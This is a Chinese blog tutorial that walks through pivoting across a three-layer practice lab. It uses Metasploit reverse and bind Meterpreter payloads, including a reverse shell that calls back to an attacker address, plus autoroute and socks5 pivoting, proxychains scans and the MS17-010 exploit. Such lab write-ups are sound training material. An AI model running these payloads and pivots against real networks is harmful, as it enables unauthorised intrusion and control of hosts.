內網滲透代理之多級代理篇
前言
在有些內網環境中,它的內網環境分為好幾層,我們必須通過拿到一層內網中伺服器的許可權之後再通過這一內網中的伺服器進一步訪問二層內網中的其他伺服器。在這種環境中,我們就需要多級代理突破層層內網,來實現在內網中漫遊。
環境搭建
本次實驗環境藉助一個CFS三層的靶機,靶機下載地址如下
【CFS三層靶機環境】百度網盤連結: 連結: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg 提取碼: dkcp 解壓密碼:teamssix.com
網路拓撲圖如下(子網掩碼都為24位)
在該網路拓撲中178網段模擬的是外網環境,239網段為第一層內網,154網段為第二層內網,每一個target靶機中都存放著一個flag,最終目的是要拿到所有目標靶機中的flag,當然我們這討論的是代理知識,所以flag我們就忽略掉。
攻擊過程
首先用nmap對178網段中存活主機做一個探測
可以發現在178網段中存在一個142的地址,也就是centos7的地址,發現142可以再利用nmap對其進行一個系統掃描
其中開放這80埠,我們可以對他的80埠進行一個訪問,最終是會發現存在一個Think PHP
該版本存在一個RCE執行,這裡利用工具進行一鍵get shell
然後蟻劍連結
連線之後,我們利用msfvenom建立一個後門
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.178.128 lport=4444 -f elf >shell.elf
通過web shell上傳到target 1伺服器上,然後在kali上配置監聽
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.178.128
執行後門拿下target 1伺服器許可權
在拿到meterpreter許可權之後,我們可以 run get_local_subnets 檢視一下網路中的路由資訊
meterpreter > run get_local_subnets
可以發現還存在239的網段,那我們先往session裡面新增一條239網段的路由
meterpreter > run autoroute -s 192.168.239.0/24
然後使用 run autoroute -p檢視session中的路由是否新增成功。
發現已存在,接下來我們使用一個socks5代理模組
msf5 exploit(multi/handler) > use auxiliary/server/socks5
然後配置好ip,run啟動
配置好了socks代理,我們可以藉助一款kali上自帶的全域性代理軟體proxychains來連線socks代理
首先我們對proxychains代理軟體進行配置
vim /etc/proxychains.conf
在末尾新增socks代理的對映關係(且與在MSF上配置的相對應)
配置好後,我們利用代理軟體來啟動nmap對239網段中存活主機做一個探測
proxychains nmap -sT -p80 192.168.239.1/24 #正常不能新增-p引數,這裡為上帝視角知道239網段中129主機啟動著一個web服務,目的是讓掃描快一點
掃描到239網段中的129地址,接下來和之前一樣對其進行一個系統的掃描,訪問web服務,web服務中存在sql注入然後拿下web許可權(target2拿web許可權的操作省略),拿下許可權通過msfvenom建立後門進行上傳,但是此處的後門要生成一個正向的後門。
msfvenom -p linux/x64/meterpreter/bind_tcp lport=1234 -f elf >shell2.elf
此處為什麼要生成一個正向的木馬呢,我們在這分析一下,這裡再放下拓撲圖,方便理解。
我們拿下了target2的web許可權,加入這是我們上傳的是反向的木馬,那麼target2就要去尋找我們kali的路由,但是target2主機中沒有kali的路由,那麼就會導致我們的反彈shell失敗,之後我們再來看看正向的。
我們生成了一個正向的木馬,我們的kali攻擊機就會去主動尋找target2的伺服器,這個時候我們應為做了一個socks5的代理,我們的流量會通過kali的ip的1080埠代理給target1,然後target1中是存在239網段中的路由的,所以我們可以正常進行連線。
理解好之後,之後的操作就很簡單了,通過我們通過sql注入拿到的web許可權上傳木馬,然後在kali上利用proxychains啟動msfconsole
root@root:~/桌面# proxychains msfconsole
然後配置監聽
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp msf5 exploit(multi/handler) > set lport 1234
msf5 exploit(multi/handler) > set rhost 192.168.239.129
執行木馬即可拿下第二層主機伺服器許可權
拿下第二層之後,之後操作大同小異,新增路由,探測第三層存活主機,發現192.168.154.129的ip,然後該臺機器存在永恆之藍漏洞,利用ms17-010拿下第三層許可權
msf5 exploit(multi/handler) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
至此三個靶機中的flag都可以找到。
__EOF__
作者: 隨風kali本文連結: https://www.cnblogs.com/sfsec/p/15524648.html
版權宣告: 本部落格所有文章除特別宣告外,均採用 BY-NC-SA 許可協議。轉載請註明出處!
聲援博主:如果您覺得文章對您有幫助,可以點選文章右下角【推薦】一下。您的鼓勵是博主的最大動力!